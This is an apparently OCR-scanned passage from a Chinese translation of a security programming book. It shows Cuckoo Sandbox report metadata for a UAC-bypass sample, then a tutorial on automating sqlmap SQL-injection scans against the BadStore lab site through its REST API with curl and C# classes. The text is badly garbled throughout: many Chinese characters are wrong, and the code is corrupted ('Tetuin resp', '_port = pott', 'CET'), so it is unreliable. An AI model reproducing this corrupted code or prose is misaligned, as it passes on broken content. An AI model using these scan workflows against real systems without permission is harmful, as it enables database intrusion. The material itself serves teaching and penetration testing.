"shutdown on : "2016-05-19 15:57:09 


$y 
“ended : “2016-05-19 15:57:09 ， 
“version : 2.0-TC2 ， 
“plLatform : "" 
“OwneT : "",， 
Options : "",， 
"0 13, 
“duration : 25 
上 局 
"signatures": [|]， 
"target": { 
"category": file ， 
"file": { 
"yara": []， 


"sha1": "f145181e095285feeb6897c9a6bd2e5f6585f294"， 

“name": “bypassuac-Xx64.exe ， 

"type": "PE32+ executable (console) x86-64, for MS Windows", 

"sha256": “四 2a694038d64bc9cfcd8caf6af35b6bfb29d2cboc95baaeffb2a11cd6e60a73d1 ， 

LS ||, 

"crc32": "26FB5E54"， 

“path": “/home/bperry/tmp/cuckoo/storage/binaries/2a694038d2cboc95baaeffb2a1iicd6e60a73d1"， 

"ssdeep": null, 

"size": 501248, 

"sha512": 
“4b09f243a8fcd71ec5bf146002519304fdbaf99f1276da25d8eb637ecbc9cebbc49b580c51e36c96c8548a41c38cc76 
595ad1776eb9bdob96cac17ca109d4d88  ， 

“md5 : "46a695c9a3b93390c11c1c072cf9ef7d" 

} 
}， 


--SNnip-- 


从 Cuckoo Sandbox 得 到 的 分 析 报 告 比较 大 。 分 析 报 告 包含 非 党 详细 的 信息 ， 这 些 信息 说 明 在 可 执行 文件 运行 时 Windows 


系统 上 上 友 生 了 什么 。 前 面 的 清单 列 出 了 天 于 分 析 的 基本 元 数据 ， 比 如 什么 机 器 运行 了 该 分 析 @， 以 及 可 执行 文件 的 芝 见 散 列 值 
@。 在 该 报告 输出 后 ， 我 们 融 可 看 到 恶意 软件 在 感染 系统 上 都 做 了 举人 什么 ， 从 而 制定 修复 及 清除 的 方案 。 


注意 这 里 只 是 报告 的 部 分 内 容 。 下 面 这 些 内 容 并 没有 在 这 里 列 出 一 一 大 量 的 WindowsAPI 和 系统 调用 、 所 访问 的 系统 中 的 
文件 ， 以 及 其 他 一 些 让 你 能 快速 确定 恶意 软件 样本 在 客户 机 上 所 作 所 为 的 非 音 评 细 的 系统 信息 。 有 天 报告 内 容 和 报告 使 用 的 更 多 
言 息 可 访问 Cuckoo Sandbox 的 文档 网 站 : http://docs.cuckoosandbox.org/en/latest/usage/results/。 


因为 对 于 后 续 有 恶意 软件 分 析 而 言 ， 使 用 输出 的 报告 文件 会 更 为 万 便 ， 所 以 可 将 整个 报告 另存 为 一 个 文件 而 不 是 打印 输出 到 控 
制 全 屏幕 上 ， 这 里 把 该 功能 作为 一 个 练习 留 给 大 家 。 


8.7 “本章 小 结 


Cuckoo sandbox 是 一 个 非 单 强大 的 恶意 软件 分 析 框 絮 ， 利 用 其 API 特 性 ， 很 容易 融 可 将 其 集成 到 工作 流程 中 ， 诸 如 电子 邮 
件 服务 器 之 类 的 基础 设施 。 由 于 能 在 阔 箱 、 可 控 的 环境 中 运行 文件 和 访问 任意 Web 站 点 ， 所 以 安全 专家 很 容易 束 能 快速 确定 攻 
击 者 是 人 否 已 使 用 有 效 载 集 或 者 过 路 式 漏 洞 利用 攻破 网 络 。 


在 本 章 中 ， 我 们 用 C# 核 心 类 和 库 实现 编程 调用 Cuckoo Sandbox 的 功能 ， 创 建 了 几 个 与 API 通 信 的 类 ， 然 后 创建 任务 并 报告 
它们 的 状态 直至 结束 。 尽 管 可 扩展 我 们 所 构建 的 类 从 而 支持 新 的 任务 类 型 ， 比 如 提交 要 在 Web 浏 览 器 中 打开 的 URL 任 务 ， 但 我 
们 这 里 的 实现 只 支持 基于 文件 的 恶意 文件 分 析 。 


利用 这 样 一 个 免费 的 高 质量 且 有 用 的 框架 ,任何 人 都 可 以 在 目 己 组 织 的 安全 关键 基础 实施 中 增加 此 功能 ， 从 而 轻松 减少 友 现 
和 修复 个 人 或 企业 网 络 潜在 攻击 的 时 间 。 


第 9 草 ” 目 动 化 运行 sqlmap 


本 章 将 编写 工具 自动 地 利用 SQL 注 入 向 量 发 起 攻击 。 本 章 将 介绍 一 个 流行 的 工具 一 一 sqlmap， 我 们 首先 用 该 工具 来 查找 并 
验证 可 能 存在 SQL 注 入 漏洞 的 HTTP 参 数 。 随 后 ， 将 这 些 功能 和 第 3 章 创建 的 SOAP 漏 洞 测试 程序 结合 在 一 起 ， 自 动 地 验证 存在 漏 
洞 的 SOAP 服 务 中 可 能 存在 的 SQL 注入 。sqlmap 支 持 REST AP1， 也 就 是 说 sqlmap 使 用 HTTP GET、PUT、POST 以 及 DELETE 请 
求 来 处 理 数据 和 标明 数据 库 中 资源 的 特定 URI。 在 第 5 章 自 动 化 调用 Nessus 时 ， 我 们 束 用 过 REST APl。 


sqlmap APl 也 支持 用 JSON 来 读 取 友 送 到 API URL (人 在 REST 中 称 作 痛 点 ) 的 HTTP 请 求 中 的 对 象 。JSON 与 XML 类 似 ， 允 许 
在 两 个 程序 间 以 标准 方式 互相 传递 数据 ， 但 JSON 要 比 XML 更 为 简洁 和 轻 量 级 。 通 常 ，sqlmap 以 手工 命令 行 的 方式 执行 ， 不 过 
如 果 通 过 编写 程序 调用 JSON API， 那 么 sqlmap 人 允许 你 自动 化 执行 更 多 任务 ， 从 检测 可 能 存在 漏洞 的 参数 到 利用 参数 漏洞 友 起 攻 


击 ， 这 远 比划 见 渗透 测试 工具 做 得 多 。 


sqlmap 是 用 Python 编 写 的 ， 开 发 更 新 活跃 ， 可 从 GitHub 网 址 https://github.com/sqlmappro-ject/sqlmap/ 上 下 载 。 可 
用 git 命 令 或 者 下 载 当前 master 分 支 的 zip 文 件 来 下 载 sqlmap。 运 行 sqlmap 需 要 在 机 器 上 安装 Python (在 大 多 数 Linux 发 布 版 本 
中 ， 默 认 安 疼 Python) 。 


如 果 你 喜欢 用 git 命 令 ， 下 面 的 命令 将 检查 最 新 的 master 分 支 : 
$ git clone https://github.com/sqlmapproject/sqlmap.git 
如 果 你 喜欢 使 用 wget 命 令 ， 可 用 wget 下 载 最 近 更 新 的 master 分 支 的 ZIP 存 档 文 件 : 


$ wget https://github.com/sqlmapprojJect/sqlmap/archive/master.z1p 
$ unzip master.zip 


为 了 使 用 本 章 中 的 示例 ， 还 需要 安 半 JSON 序 询 化 框架 ， 比 如 可 选择 开源 的 Json.Net。 可 
从 https://github.com/JamesNK/Newtonsoft.JJson 上 下 载 ， 或 者 使 用 NuGet 包 管理 器 ， 在 大 部 分 C#|DE 集 成 环境 中 都 包含 该 
包 管 理 器 。 在 第 2 章 和 第 5 章 中 我 们 曾 使 用 过 这 个 库 。 


9.1 运行 sqlmap 


大 多 数 安 全 工程 师 和 渗透 测试 入 员 使 用 Python 脚本 sqlmap.pPy (在 sqlmap 工 程 的 根 目录 下 ， 或 者 安 闪 完 半 后 在 系统 环境 可 
达 路 径 下 ) 来 以 命令 行 方式 调用 sqlmap。 人 在 深入 讨论 APl 之 前 ， 先 简单 复习 下 如 何 运 行 sSqlImap 命 令 行 工 具 。Kali 系 统 默 认 已 安 
和 sqlImap， 因 此 可 从 系统 任何 地 方 运行 sqlImap。 尽 管 sqlmap 命 令 行 工具 与 API 的 功能 完全 一 样 ， 但 是 如 果 不 调用 shell|， 难 以 
将 其 集成 到 其 他 程序 中 。 在 与 其 他 代码 集成 的 时 候 ， 相 比 仅 仪 使 用 命令 行 工 具 而 言 ， 编 写 程序 调用 AP| 更 为 安全 并 且 更 为 灵活 。 


注意 : 如 果 没 有 运行 Kali， 你 可 能 有 一 个 已 下 载 的 sqlmap， 但 未 在 系统 上 安装 。 即 使 没有 在 系统 上 安装 ， 你 仍然 可 以 使 用 
sqlmap， 你 可 将 路 径 变 更 到 sqlmap 所 在 的 目录 ， 然 后 使 用 如 下 命令 直接 用 Python 运 行 Sqlmap.py 脚 本 : 


$ python ./sqlmap.py [.. args ..| 
典型 的 sqlmap 命 令 如 清单 9-1 所 示 。 
清单 9-1: 一 个 针对 BadStore 网 站 运行 Sqlmap 命 令 的 示例 


$ sqlmap @--method=GET --level=3 --technique=b @--dbms=mysql \ 
@-u "http://10.37.129.3/cgi-bin/badstore.cgi?searchquery=fdsa&action=search" 


这 里 不 介绍 清单 9-1 所 示 命 令 的 输出 ， 但 请 注意 命令 的 语法 。 在 该 清单 中 ， 传 给 sqlmap 的 参数 告诉 其 我 们 要 测试 某 个 
URL (如 你 所 愿 是 一 个 常见 的 URL， 与 第 2 草 测 斌 BadStore 时 所 用 的 URL 类 似 ) 。 我 们 告诉 sqlmap 使 用 HTTP 的 GET 方 法 @， 使 
用 指定 的 MySQL@ 有 效 载荷 (而 不 是 PostgreSQL 或 Microsoft SQL Server 有 效 载 荷 ) ， 后 面 紧 跟 要 测试 的 URLG。sqlmap 脚 
本 能 使 用 的 参数 只 有 一 个 很 小 的 子 集 。 如 果 想 手工 尝试 其 他 命令 ，5 
在 https://github.com/sqlmapproject/sqlmap/wiki/Usage/ 上 查看 更 详细 的 信息 。 我 们 可 用 sqlmap REST APl 来 调用 sqlmap 
功能 ， 其 效果 和 清单 9-1 中 的 sqlmap 命 令 一 样 。 


由 于 sqlmap.py 脚 本 已 在 系统 上 安装 ， 因 此 可 在 诸如 Kali 之 类 的 系统 shell (命令 解释 器 ) 中 调用 。 但 API 服 务 器 有 可 能 并 未 
在 系统 上 安 濠 ， 所 以 在 运行 Sqlmapapi.py API 示 例 时 ， 需 要 运行 API 服 务 器 。 为 了 使 用 sqlmap API1， 如 果 需 要 下 载 sqlmap， 可 
在 GitHub (https://github.com/sqlmapproject/sqlmap/) 上 找到 。 


9.1.1 sqlmap REST API 


有 关 sqlmap REST API 的 官 万 文档 比较 少 ， 本 书 将 涵 苹 有 效 使 用 REST API 所 需 了 解 的 所 有 人 信息。 首先 运行 Sqlmapapi.py- 
server (该 脚本 位 于 之 前 下 载 的 sqlmap 工 程 目 录 的 根 目 录 ) 来 局 动 sqlmap API 服 务 器 ， 该 服务 器 监听 在 127.0.0.1 (默认 在 8775 
痛 口 ) ， 如 清单 9-2 所 示 。 


清单 9-2: 启动 sqlmap API 服 务 器 


$ ./sqlmapapi.py --server 

[22:56:24] [INFO| Running REST-JSON API server at '127.0.0.1:8775'.. 
[22:56:24] [INFO] Admin ID: 75d9b5817a94ff9a07450c0305c03f4f 
[22:56:24] [DEBUG| IPC database: /tmp/sqlmapipc-34A3Nn 

[ ] | 


22:56:24| [DEBUG| REST-JSON API server connected to IPC database 


sqlmap 有 几 个 我 们 创建 自动 化 工具 所 需要 的 REST API 咒 点 。 为 了 使 用 sqlmap， 需 要 创建 任务 ， 然 后 用 AP 请求 来 作用 于 这 
些 任 务 。 大 多 数 可 用 端点 使 用 GET 请 求 ， 这 些 请 求 旨 在 检 款 数据 。 如 果 要 得 看 有 哪些 GET API 闻 点 可 用 ， 可 在 sqlmap 项 目 目录 


的 根 目录 运行 rgrep“@get” 人 划 令 ， 如 清单 9-3 所 示 。 这 个 命令 列 出 了 许多 可 用 的 API 冯 点， 这 些 闯 点 是 API 中 用 于 特定 操作 的 一 
些 特定 的 URL。 


清单 9-3: 可 用 的 sqlmap REST API GET 请 求 


$ rgrep "Q@get" . 
lib/utils/api.py:Q@get("/task/new@ ") 
lib/utils/api.py:Q@get("/task/taskid/delete@") 
lib/utils/api.py:Q@get("/admin/taskid/list") 
lib/utils/api.py:Q@get("/admin/taskid/flush") 
lib/utils/api.py:Q@get("/option/taskid/list") 
lib/utils/api.py:Q@get("/scan/taskid/stop®@") 
--S1ip-- 


下 面 我 们 很 快 就 将 介绍 如 何 使 用 API 问 点 来 创建 @、 终 止 @ 以 及 删除 @sqlmap 任 务 。 将 上 述 命 令 中 的 @get 更 换 为 @post 右 
可 得 看 用 于 POST 请 求 的 API 可 用 痛 点 。 如 清单 9-4 所 示 ， 只 有 三 个 API 调 用 需要 使 用 HTTP POST 请 求 。 


清单 9-4: 用 于 POST 请 求 的 REST API 端 点 


$ rgrep “Opost . 

lib/utils/api.py:@post("/option/taskid/get") 
lib/utils/api.py:@post("/option/taskid/set") 
lib/utils/api.py:@post("/scan/taskid/start") 


在 使 用 sqlmap API 的 时 候 ， 我 们 需要 创建 一 个 任务 来 测试 给 定 URL 是 否 存 在 SQL 注 入 。 任 务 用 它们 的 任务 1D 来 标示 ， 束 是 
在 清单 9-3 和 清单 9-4 中 要 用 我 们 的 输入 来 替换 的 APl 选 项 里 面 的 taskid。 可 用 curl 测 试 sqlmap 服 务 器 以 确保 服务 器 运行 正常 ， 感 


受 下 API 如 何 运转 ， 并 获取 其 返回 的 数据 。 当 开始 编写 sqlmap 类 时 ， 这 有 助 于 使 我 们 清楚 了 解 C# 代 码 是 如 何 运 行 的 。 


9.1.2 ”用 curl 测 试 sqlmap API 


在 本 章 前 面 ， 我 们 通常 采用 Python 脚本 以 命令 行 的 方式 运行 sqlmap。 但 是 ，Python 命 令 隐 藏 了 sqlmap 在 后 台 执 行 的 操 
作 ， 无 法 详细 了 解 每 个 API 调 用 是 如 何 运转 的 。 要 直接 了 解 如 何 使 用 sqlmap AP1， 可 用 命令 行 工具 cur|， 该 工具 常用 来 发 起 
HTTP 请 求 并 查看 那些 请 求 的 响应 。 清 单 9-5 展 示 了 如 何 通过 curl 连 接 到 sqlmap 监 听 的 端口 ， 发 起 请 求 来 创建 一 个 新 的 sqlmap 任 


务 。 


清单 9-5: 用 curl 创 建 一 个 sqlmap 新 任务 


$ curl @127.0.0.1:8775/task/new 


四 taskid : dce7f46a991C5238 ， 
“SUCCeSS : 上 true 


} 


在 这 里 ,端口 是 127.0.0.1: 8775@。 命 令 执 行 后 ， 在 taskid 天 键 字 和 冒号 之 后 返回 一 个 新 的 任务 ID@O。 在 友 起 HTTP 请 求 之 
前 ,需要 像 清 单 9-2 所 示 那 样 确保 sqlmap 服 务 器 已 运行 。 


在 用 curl 向 /task/new 端 点 发 起 简单 的 GET 请 求 之 后 ，sqlmap 返 回 了 一 个 新 的 任务 ID 给 我 们 使 用 。 我 们 将 用 这 个 任务 ID 来 发 
起 其 他 后 续 API 调 用 ， 包 括 启动 和 终止 任务 、 获 取 任 务 结果 。 要 查看 给 定 任务 I|D 可 用 的 sqlmap 扫 描 选 项 ， 可 调 
用 /optiony/taskidylist 端 点 ， 并 用 前 面 创建 的 ID 来 替换 里 面 的 taskid， 如 清单 9-6 所 示 。 注 意 在 API 端 点 请 求 中 我 们 使 用 了 清单 9- 
5 返回 的 任务 ID。 了 解 用 于 任务 的 选项 对 于 后 面 要 进行 的 SQL 注入 扫 摘 是 非 党 重要 的 。 


清单 9-6: 列 出 给 定 任务 1D 的 选项 


$ curl 127.0.0.1:8775/0ption/dce7f46a991c5238/1ist 
{ 

"options": { 

“CTawlDepth : null, 
"osShell": false, 

@ getUsers : false, 

@ getPasswordHashes : false, 
“excludeSysDbs": false, 
“UChar : null, 

--SNnip-- 

@"tech": "BEUSTO", 
“textOonly : false, 
“CommonColumns : false, 
keepAlLive : false 


} 
} 


每 个 任务 选项 对 应 命令 行 Sqlmap 工 具 的 一 个 命令 行 参 数 。 这 些 选 项 告诉 sqlmap 如 何 开展 SQL 注 入 扫描 ， 如 何 利 用 发 现 的 注 
入 漏洞 。 在 清单 9-6 所 示 的 选项 中 ， 需 要 注意 的 是 用 来 设置 验证 所 用 注入 技术 的 那个 选项 (tech) ; 这 里 该 选项 设置 为 默认 值 
BEUSTQ， 也 就 是 验证 所 有 的 SQL 注 入 类 型 @)。 还 可 看 到 用 于 导出 用 户 (user) 数据 库 的 选项 ， 但 在 这 个 示例 中 该 选项 是 关闭 的 
Q@; 还 能 看 到 导出 密码 散 列 值 的 选项 ， 该 示例 中 也 是 关闭 的 @。 如 果 要 了 解 所 有 选项 的 用 途 ， 可 在 命令 行 下 运行 Sqlmap--help 


来 查看 选项 的 具体 摘 述 和 用 途 。 


创建 完 任务 并 查看 完 任务 的 当前 设置 选项 后 ， 融 可 对 其 中 某 个 选项 进行 设置 ， 然 后 局 动 扫 搞 。 要 设置 特定 选项 ， 需 要 友 起 一 
个 POST 请 求 ， 在 请 求 里 面包 合 一 些 数 据 以 告 烛 sqlmap 要 把 选项 设置 为 何 值 。 清 单 9-7 详 细 襄 明了 如 何 用 curl 局 动 sqlmap 扫 摘 来 
测试 菏 个 新 URL。 


清单 9-7: 用 sqlmap API 以 新 选项 启动 一 个 扫描 


$ curl @-X POST @-H "Content-Type:application/json” \ 
@--data '{"url":"http://10.37.129.3/cgi-bin/badstore.cgi?searchquery=fdsa&action=search"}' \ 
@http://127.0.0.1:8775/scan/dce7f46a991c5238/start 


{ 
“engineid : 7181, 
"success': true® 


这 个 POST 请 求 命令 看 起 来 和 清单 9-5 中 的 GET 请 求 不 同 ， 但 实际 上 是 非常 相似 的 。 首 先 ， 把 命令 指定 为 POST 请 求 @。 然 
后 ， 把 要 设置 的 选项 名 称 放 在 引号 里 面 (比如 “url”) ， 后 面 紧 跟 一 个 冒号 ， 之 后 是 选项 要 设置 的 数据 @， 通 过 这 种 方式 列 出 
要 发 送 给 API 的 数据 。 我 们 用 -H 参 数 将 数据 内 容 指 定 为 JSON 格 式 ， 用 来 定义 一 个 新 的 HTTP 头 @， 这 样 可 确保 将 用 于 sqlmap 服 
务 器 的 Content-Type 头 正确 地 设置 为 application/json MIME 类 型 。 随 后， 用 和 清单 9-6 中 GET 请 求 类 似 的 API 调 用 格式 以 POST 
请 求 方式 局 动 该 命令 ， 访 问 端 点 /scan/tasked/start@。 


一 旦 局 动 扫描 并 且 sqlmap 返 回 成 功 @@， 我 们 融 需 要 获取 扫 摘 的 状态 。 这 可 用 status 闯 点 通过 简单 的 curl 调 用 来 实现 ， 如 清单 
9-8 所 示 。 


清单 9-8: 获取 扫 拉 的 状态 


$ curl 127.0.0.1:8775/scan/dce7f46a991c5238/status 


{ 

@ status : “terminated ， 
“Yeturncode : 0， 
“SUCCeSsS : true 


扫 摘 结束 后 ，sqlmap 将 把 扫 摘 状态 更 改 为 结束 (terminated) @。 一 旦 扫描 结束 ， 就 可 用 log 端 点 来 检索 扫 描 日 志 ， 从 而 
看 看 sqlmap 在 扫 拉 过程 中 是 否 发 现 一 些 东 西 ， 如 清单 9-9 所 示 。 


清单 9-9: 及 起 一 个 获取 扫 摘 日 志 的 请 求 


$ curl 127.0.0.1:8775/scan/dce7f46a991c5238/l1o0og 
{ 
"log': | 
L 
@ message : "flushing session file ， 
@ level : INFO ， 
@@ time : 09:24:18 
}， 
L 
-message : testing connection to the target URL ， 
Level : INFO ， 


"time": "09:24:18" 
] 


--SNn1ip-- 


] 


2 
Uccess": true 


sqlmap 扫 描 日 志 是 一 个 状态 数组 ， 包 含 了 每 个 状态 的 消息 @、 消 息 级 别 @ 以 及 时 间 截 @)。 扫 摘 日 志 使 得 我 们 可 以 非常 清楚 
sqlmap 扫 擅 给 定 URL 过 程 中 到 旗 友 生 了 什么 ， 还 包括 所 有 可 注入 的 参数 。 扫 摘 结 束 得 到 扫 摘 结果 之 后 ， 我 们 需要 继续 做 些 清理 
工作 以 节约 系统 和 资源。 要 在 扫 摘 结束 后 删除 我 们 创建 的 任务 ， 调 用 /taskwVtaskid/delete， 如 清单 9-10 所 示 。 可 通过 API 目 如 地 创 
建 、 调 度 以 及 删除 任务 。 


清单 9-10: 通过 sqlmap API 万 式 删 除 一 个 任务 


$ curl] 127.0.0.1:8775/task/dce7f46a991c5238/delete@ 
| 


"success'": true®@ 


} 


调用 /task/taskid/delete 江 点 @ 后 ，API 将 返回 任务 的 状态 以 说 明 任 务 是 否 被 成 功 删除 @。 既 然 我 们 已 了 解 创建 、 运 行 以 及 
删除 sqlmap 扫 手 的 常见 工 作 流程 ， 下 面 我 们 殊 开 始 致 力 于 编写 我 们 的 C# 类 ， 用 这 些 类 目 动 化 完成 从 开始 到 结束 的 整个 过 程 。 


9.2 创建 一 个 用 于 sqlmap 的 会 话 


由 于 使 用 REST API 不 需要 认证 ， 所 以 会 话 /管理 器 (session/manager) 模式 使 用 起 来 比较 简单 ， 这 和 前 面 章 节 中 提 到 的 其 
他 API 模 式 类似 。 这 种 模式 让 我 们 将 协议 的 传输 (如 何 与 API 交 流 ) 和 协议 外 在 的 功能 (API 能 干什么 ) 分 开 。 我 们 实现 了 
SqlmapSession 和 SqlmapManager 这 两 个 类 ， 用 这 两 个 类 调用 sqlmap AP| 来 自动 地 查找 和 利用 注入 点。 


首先 开始 编写 SqlImapSession 类 。 如 清单 9-11 所 示 ， 这 个 类 只 需要 一 个 构造 肖 数 和 两 个 方法 ， 这 两 个 方法 分 别 是 
ExecuteGet () 和 ExecutePost () 。 这 些 方法 将 完成 我 们 所 编写 的 两 个 类 的 大 部 分 工作 。 它 们 发 起 HTTP 请 求 (一 个 用 于 GET 
请 求 ， 一 个 用 于 POST 请 求 ) ， 从 而 让 我 们 的 类 与 sqlmap REST API 通 信 。 


清单 9-11: SqlmapSession 类 


public class @SqlmapSession : IDisposabjle 


{ 
private string host = string.Empty; 
private int port = 8775; //default port 


public @SqlmapSession(string host, int port = 8775) 
L 

host = host; 

_port = pott ; 
} 


public string @ExecuteGet(string ur]) 
{ 


return string.Empty; 


} 


public string @ExecutePost(string url, string data) 
L 


return string.Empty; 


public void ©@Disposel() 


L 
host = null; 


} 
} 


我 们 从 创建 一 个 叫 作 SqlmapSession@ 的 公有 类 开始 ， 这 个 类 实现 了 IDisposable 接 口 。 用 一 个 using 语 句 就 可 使 用 
SqlmapSession， 由 于 变量 通过 垃圾 回收 机 制 来 管理 ， 束 使 得 我 们 编写 的 代码 更 为 简洁 明了 。 我 们 还 声明 了 两 个 私有 字段 ， 即 
主机 和 闯 口 ， 在 上 起 HTTP 请 求 时 融会 用 到 这 两 个 字段 。 黑 认 情 况 下 ， 我 们 给 host 变量 赋 string.empty 值 。 这 是 C 拓 9 一 个 特 
性 ， 人 允许 你 给 某 个 变量 赋 一 个 空 的 字符 串 ， 而 不 用 实际 上 真正 实例 化 一 个 字符 串 对 象 ， 从 而 可 略微 地 提升 一 些 系统 性 能 (但 在 这 
里 ， 只 是 给 该 变量 赋 一 个 默认 值 ) 。 我 们 将 sqlmap 监 听 的 端口 值 赋 给 _ port 变量， 在 默认 情况 下 是 8775。 


在 声明 私有 字段 之 后 ， 我 们 创建 一 个 构造 亢 数 ， 访 阔 数 接受 如 下 两 个 参数 @: 主机 和 问 口 。 通 过 把 作为 参数 传 给 构造 亢 数 的 
值 赋 给 私有 变量 ， 来 连接 到 正确 的 API 主 机 和 端口 。 此 外 ， 我 们 还 声明 了 两 个 仓 根 方法 (stub method) 用 于 执行 GET 和 POST 
请 求 ， 目 前 这 些 请 求 只 是 返回 string.Empty。 后 面 将 对 这 些 方法 进行 定义 。ExecuteGet () 万 法 @ 只 需要 一 个 URL 作 为 输入 ， 
而 ExecutePost () 方法 @ 则 需要 一 个 URL 和 要 上 传 的 数据 作为 输入 。 最 后 ， 我 们 编写 了 Dispose () 方法 @， 在 实现 
IDisposable 接 口 时 需要 该 方法 。 在 这 个 万 法 中 ， 通 过 将 null 值 赋 给 私有 字段 来 清理 这 些 字 段 。 


9.2.1 创建 执行 GET 请 求 的 方法 


清单 9-12 列 出 了 如 何 用 WebRequest 来 实现 第 一 个 仔 根 方法 ， 用 这 个 方法 执行 GET 请 求 并 返回 一 个 字符 串 。 


清单 9-12: ExecuteGet () 方法 


public string ExecuteGet(string ur]) 


{ 
HttpWebRequest req = (HttpWebRequest)WebRequest.@Create("http://" + host + ":" + port + ur]l); 


req.Method = CET ; 


string resp = string.Empty; 
@using (StreamReader rdr = new StreamReader(req.GetResponse().GetResponseStream())) 
resp = rdr.®@ReadToEnd(); 


return resp,; 


} 


用 host、_port 以 及 url 变 量 来 构建 一 个 完整 的 URL， 用 其 创建 一 个 WebRequest@， 然 后 将 Method 属 性 设置 为 GET。 接 
着 ， 执 行 这 个 请 求 @ 并 用 ReadToEnd () 方法 @ 将 响应 读 到 一 个 字符 串 中 ， 最 后 将 这 个 字符 串 返回 给 调用 方法 。 在 实现 
sqlmapManager 类 的 时 候 ， 可 用 Json.NET 库 来 反 序 列 化 字符 串 中 返回 的 JJON ， 从 而 可 较 容 易 地 从 中 获取 值 。 反 序列 化 是 将 字 
符 串 转换 为 JJON 对 象 的 过 程 ， 而 序列 化 则 与 之 相反 。 


9.2.2 ”执行 POST 请 求 


ExecutePost () 方法 只 比 ExecuteGet () 方法 略微 复杂 一 点 。EXxecuteGet () 方法 只 能 发 起 简单 的 HTTP 请 求 ， 而 
ExecutePost () 方法 则 人 允许 我 们 发 送 包含 更 多 数据 (比如 JSON) 的 复杂 一 些 的 请 求 。ExecutePost () 方法 同样 返回 一 个 包 
合 JSON 响 应 的 字符 串 ， 后 续 将 由 SqlmapManager 来 反 序列 化 这 个 字符 串 。 清 单 9-13 列 出 了 如 何 实现 ExecutePost () 方法 。 


清单 9-13: ExecutePost () 方法 


public string ExecutePost(string url, string data ) 


byte[] buffer = @Encoding.ASCIIT.GetBytes(data); 
HttpWebRequest req = (HttpWebRequest)WebRequest.Create("http://"+ host+":"+ port+url); 


req.Method = “POST 外; 
req.ContentType = “application/json'"®; 
req.ContentLength = buffer.Length; 


using (Stream stream = req.GetRequestStream()) 
stream. @Write(buffer, 0, buffer.Length); 


string resp = string.Empty; 
using (StreamReader TY = new StreamReader(req.GetResponse().GetResponseStream())) 
resp = r.@ReadToEnd(); 


Tetuin resp; 


} 


这 与 第 2 章 和 第 3 章 中 我 们 模糊 测试 POST 请 求 时 编写 的 代码 非常 相似 。 这 个 方法 需要 两 个 参数 : 一 个 绝对 URI 和 要 发 送 给 
法 的 数据 。Encoding 类 @ (在 System.Text 命 名 空间 中 可 用 ) 创建 一 个 用 来 描述 要 上 传 数据 的 字 节 数组 。 然 后 ， 就 像 
ExecuteGet () 方法 所 做 的 那样 ， 创 建 一 个 WebRequest 对 象 并 完成 设置 ， 唯 一 的 不 同 是 这 里 要 将 Method 属 性 设置 为 
POSTO。 需 要 注意 的 是 ， 我 们 还 将 ContentType 设 定 为 application/jsonG@， 将 ContentLength 设 定 为 字 节 数组 的 长 度 。 因 为 
要 向 服务 器 发 送 JSON 数 据 ， 所 以 需要 在 HTTP 请 求 中 设置 正确 的 内 容 类 型 和 数据 长 度 。 在 完成 WebRequest 设 置 后 ， 将 字 节 数 


组 写 @ 到 请 求 TCP 流 中 ， 从 而 将 JSON 数 据 作为 HTTP 请 求 体 友 送 给 服务 器 。 最 后 ， 将 HTTP 响 应 读 取 @ 到 字符 串 中 返回 给 调用 方 
法 。 


9.2.3 ”测试 session 类 


下 面 我 们 就 可 以 编写 一 个 小 应 用 程序 来 在 Main () 方法 中 测试 新 创建 的 9gqlmap-sSession 类 了 。 创 建 一 个 新 任务 ， 调 用 我 们 
编写 的 方法 ， 然 后 删除 这 个 任务 ， 如 清单 9-14 所 示 。 


清单 9-14: sqlmap 控 制 谷 应 用 程序 的 Main () 方法 


public static void Main(string[ | args) 


L 
string host = @args[o0]; 
int port = int.Parse(args[1]); 
using (SqlmapSession session = new @SqlmapSession(host, port)) 


string response = session.@ExecuteGet("/task/new"); 
JToken token = JObject.Parse(response); 
string taskID = token.@SelectToken("taskid").ToString(); 


©@Console.WritelLine("New task id: ”+ taskID); 


Console.Writeline("Deleting task: ”+ taskID); 


@response = session.ExecuteGet("/task/" + taskID + "/delete"); 
token = JObject.Parse(response); 
bool success = (bool)token.@SelectToken("success"); 


Console.WritelLine("Delete successful: ”+ success); 
} 
} 


如 第 5 章 所 述 ，Json.NET 库 使 得 在 C# 中 处 理 JSON 变 得 简单 。 我 们 分 别 从 传 给 程序 的 第 一 个 参数 和 第 二 个 参数 中 获取 主机 地 
址 和 端口 值 @。 然 后 用 int.Parse () 来 从 字符 串 参 数 中 解析 得 到 端口 的 整数 值 。 尽 管 在 本 章 中 我 们 一 直 使 用 8775 端 口 ， 但 由 于 
端口 是 可 配置 的 (8775 只 是 默认 值 ) ， 所 以 我 不 能 假设 端口 总 是 8775。 一 旦 给 变量 赋 完 值 后 ， 就 可 用 传 给 程序 的 参数 来 实例 化 
一 个 新 的 SqlmapSession 类 Q@。 随 后 ， 调 用 /task/new 端 点 @ 来 检索 新 的 任务 ID， 用 JObject 来 解析 返回 的 JSON。 解 析 完 响应 
后 ， 用 SelectToken () 方法 @ 来 检索 taskid 键 的 值 ， 并 将 这 个 值 赋 给 tasklD 变 量 。 


注意 : C# 中 有 些 标准 类 型 具备 Parse () 方法 ， 比 如 我 们 刚刚 使 用 的 int.Parse () 方法 。 这 里 的 int 类 型 是 指 Int32 类 型 ， 因 此 
int.Parse () 方法 将 尝试 解析 一 个 32 位 的 整数 。Int16 是 短 整 型 ， 因 此 short.Parse () 将 尝试 解析 16 位 的 整数 。Int64 是 一 个 长 整 
型 ， 因 此]ong.Parse () 将 尝试 解析 64 位 整数 。 另 外 还 有 个 比较 有 用 的 Parse () 方法 是 Date-Time 类 的 Patse () 方法 。 这 些 方法 都 
是 静态 的 ， 所 以 不 需要 对 象 实例 化 。 


将 新 tasklD 打 印 到 控制 台 @) 上 之 后 ， 通 过 调用 /task/taskid/delete 端 点 @ 即 可 删除 这 个 任务 。 这 里 我 们 再 次 使 用 JObject 类 
来 解析 JSON 响 应 ， 然 后 检索 success 键 的 值 ， 将 这 个 值 作为 Boolean 类 型 ， 并 将 其 赋 给 success 变 量 。 这 个 变量 的 值 将 被 输出 
到 控制 台 上 ， 告 诉 用 户 任务 是 否 删除 成 功 。 当 你 运行 该 工具 的 时 候 ， 会 产生 有 关 创 建 和 删除 任务 的 输出 ， 如 清单 9-15 所 示 。 


清单 9-15: 运行 创建 sqlmap 任 务 然后 将 其 删 挥 的 程序 


$ mono ./ch9 automating sqlmap.exe 127.0.0.1 8775 
New task id: 96d9fb9d277aa082 

Deleting task: 96d9fb9d277aa082 

Delete successful: True 


